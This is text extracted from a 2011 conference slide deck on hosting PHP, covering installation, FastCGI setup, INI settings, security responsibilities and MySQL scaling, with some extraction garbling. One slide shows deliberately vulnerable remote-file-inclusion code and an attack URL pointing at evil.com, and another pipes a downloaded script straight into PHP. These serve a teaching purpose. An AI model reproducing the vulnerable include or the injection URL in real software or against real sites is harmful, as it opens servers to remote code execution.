Post on 06-Dec-2014
description
PHP through the eyes of a hoster
Thijs FerynEvangelist+32 (0)9 218 79 06thijs@combellgroup.com
PHPBenelux ConferenceSaturday January 29th 2011Antwerpen, Belgium
Welcome to PHPBNL11
About me
I’m the support manager at Combell
About me
I’m the support manager at Combell
I used to be
About me
I’m an Evangelist at Combell
About me
I’m a board member at PHPBenelux
I live in the wonderful city of Bruges
MPBecker -‐ Bruges by Night hYp://www.flickr.com/photos/galverson2/3715965933
Follow me on TwiYer: @ThijsFeryn
Read my blog: hYp://blog.feryn.eu
Give me feedback: hYp://joind.in/2490
Chapter I : The hoster, a genuine stakeholder in the PHP universe
Stakeholders
Customer Development company
Endusers MGMT
InternalIT
InternalPM
Devs
Sales
MGMT
QA
Design
Systeam
PM
Consultant
Hoster PHP community
Stakeholders
Your app needs to be hosted
Somewhere along the road ...
Goals & mocves
Our goals & moEves are the same as yours:• It has to work• It has to perform• It has to scale• It has to be secure• It has to be available
Chapter II: Installacon & configuracon
Installing from source
server$ ./configure -‐-‐prefix=/usr/local/php-‐5.2.10 -‐-‐with-‐apxs2=/usr/local/httpd-‐2.2.12/bin/apxs -‐-‐with-‐zlib -‐-‐with-‐curl -‐-‐with-‐gd -‐-‐enable-‐mbstring -‐-‐with-‐mysql -‐-‐with-‐mysqli -‐-‐enable-‐pcntl -‐-‐with-‐pdo-‐mysql -‐-‐with-‐readline -‐-‐enable-‐soap -‐-‐with-‐xsl -‐-‐with-‐mcrypt -‐-‐with-‐mssql -‐-‐with-‐snmp -‐-‐with-‐imap -‐-‐with-‐kerberos -‐-‐with-‐imap-‐ssl -‐-‐with-‐config-‐file-‐path=/etc/php5/ -‐-‐enable-‐sockets -‐-‐with-‐freetype-‐dir -‐-‐with-‐openssl
server$ make
server$ make install
Installing using a package manager (APT/Apctude)
Install PHP:
Install MySQL library for PHP:
server$ apt-‐get install php5
server$ apt-‐get install php5-‐mysql
SAPI ... schmapi
Mod_php FastCGI CLI
Web Apache module gateway -‐
Process Apache process php-‐cgi php
ConfiguraEon Apache conf files wrapper on the fly
User Apache user shell user or suexec user shell user
FastCGI
Example config:• Apache handler
<IfModule mod_fcgid.c> SuexecUserGroup dev dev PHP_Fix_Pathinfo_Enable 1 <Directory /var/www/dev/www/> Options +ExecCGI AllowOverride All AddHandler fcgid-‐script .php FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php Order allow,deny Allow from all </Directory> </IfModule>
FastCGI
Example config:• Wrapper script
#!/bin/shPHPRC=/usr/local/php-‐5.3.1/etcexport PHPRCexport PHP_FCGI_MAX_REQUESTS=5000export PHP_FCGI_CHILDREN=8exec /usr/local/php-‐5.3.1/bin/php-‐cgi
INI seengs: tales of good & evil
INI seengs: tales of good & evil
Defining INI seengs:• Php.ini• Ini_set()• “-‐d” • php_value• php_flag• php_admin_value• php_admin_flag
INI seengs: tales of good & evil
Memory_limit:
Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
INI seengs: tales of good & evil
Safe_mode & Open_basedir:
<IfModule mod_php5.c> php_admin_flag engine on php_admin_flag safe_mode off php_admin_value open_basedir "/var/www/vhosts/website.com/httpdocs:/tmp"</IfModule>
INI seengs: tales of good & evil
Allow_url_fopen:
<?php$lang= $_GET['lang'];require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
Chapter III: Versions & features
PHP 4: End of life, but far from dead
PHP 4: End of life, but far from dead
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
Developers love bling bling
It HAS to be PHP 5.3.5 !!!
I need ALL PHP extension !!!
I use ALL PHP features !!!
Fruit & vegetables: PEAR & PECL
Fruit & vegetables: PEAR & PECL
PEARPHP Extension and ApplicaEon Repository (h#p//pear.php.net)
server$ pear install date
server$ lynx -‐source http://pear.php.net/go-‐pear | php
Fruit & vegetables: PEAR & PECL
PECL (pickle)PHP Extension Community Library (h#p//pecl.php.net)
server$ pecl install pecl_http
Popular frameworks outside the PHP project
External frameworks
Chapter IV: PHP aYracts a crowd
It’s easy !
That easy !
<?phpecho "Hello world!";
It’s cheap !
It’s stable !
Everyone can be a PHP developer
But not everyone has what it takes
Luckily there’s a lot ready-‐to-‐use PHP so\ware out there
Who you gonna call ?
But when helpers need help ...
They reach out to the PHP community
BlogsForums
User Group meeEngs
Conferences
PHP.netTwi^er
IRC
Chapter V: Here be phpirates
Here be phpirates
Fact
“The majority of hacking/absue cases are PHP related”
False assumpcons
“Open source is evil”
“PHP has lots of security vulnerabiliEes and is not mature”
Here be phpirates
The real issues• Quality of the code• Network & server security• PHP version & configuraEon
Responsibilices
Chapter VI: Scalability
Performance == speed
Scalability == constant speed under increasing load
Scaling up
Scaling out
Developers (some2mes) forget ...
Scaling MySQL
mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12;
*************************** 1. row *************************** id: 1 select_type: PRIMARY table: table1 type: ALLpossible_keys: approved key: approved key_len: NULL ref: NULL rows: 3143 Extra: Using where; Using filesort*************************** 2. row *************************** id: 2 select_type: DEPENDENT SUBQUERY table: table2 type: ALLpossible_keys: NULL key: NULL key_len: NULL ref: NULL rows: 1005 Extra: Using where
mysql> show processlist;+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+| Id | User | Host | db | Command | Time | State | Info |+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+| 63515 | root | localhost | db | Query | 0 | NULL | show processlist || 81763 | root | localhost | db | Sleep | 105 | | NULL || 85187 | root | localhost | db | Query | 0 | Sending data | SELECT data from someTable where field = 'val' || 82701 | root | localhost | db | Query | 0 | Copying to tmp table | SELECT data from someTable where field='val2' || 82709 | root | localhost | db | Query | 0 | Sorting result | SELECT data from someTable where order by field || 82716 | root | localhost | db | Query | 0 | Opening tables | SELECT data from someOtherTable |+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
Scaling MySQL with replicacon
PHP scalability toolbox
Memcached
Gearman
Varnish
Summary
Summary
1.Hosters are a genuine stakeholder in the PHP universe2.PHP is highly flexible & configurable. Hosters have to ensure a decent setup
3.PHP has a lot to offer feature-‐wise4.PHP aDracts a crowd and brings a lot of people together from different industries (e.g. hosters)
5.Lots of abuse cases are PHP related, but that’s not the fault of PHP itself
6.PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools
Q&A